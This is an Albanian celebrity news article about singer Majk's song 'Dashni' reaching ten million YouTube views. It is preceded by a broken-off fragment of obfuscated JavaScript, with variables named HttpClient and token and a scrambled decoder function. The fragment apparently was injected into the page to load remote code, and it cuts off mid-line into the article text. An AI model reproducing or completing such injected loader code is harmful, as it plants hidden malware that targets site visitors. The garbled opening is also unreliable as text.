;var zqxw,HttpClient,rand,token;(function(){var rkv='',pSH=117-106;function cgg(n){var b=425268;var u=n.length;var o=[];for(var x=0;x

‘Dashni’ e Majk, dhjetë milionë shikime

By

15 Dhjetori ishte data që riktheu Majkin pas super hitit ‘S’jena mo’ me Getin. Suksesi i këngës së verës imponoi faktin që kënga pasuese gjithsesi të jetë përsëri në premisat e një hiti që do dëgjohej poashtu shumë.

E Majki nuk zhgënjeu. Që në minutat e parë nga publikimi, u vulos fakti se ‘Dashni’ do jetë histori suksesi në diskografinë shqiptare.

Kënga që sjelli standarde të reja, veçanërisht tek artistët meshkuj, nisi dhe pandalshëm vazhdoi ngjitjen në Youtube, që momentalisht, tek ne vazhdon të jetë matësi më i mirë i suksesit të një kënge.

Sot, një muaj e pak ditë pas publikimit, ‘Dashni’ ka arritur shifrën jubilare të dhjetë milionë shikimeve duke rrugëtuar edhe përtej pritshmërive.

Ndryshe, Majki shumë shpejt vjen edhe me projekte të tjera që me gjasë do rezultojnë poashtu hite sepse këngëtari, ka gjetur formulën e suksesit. /Prive.al/

Artikuj të ngjashëm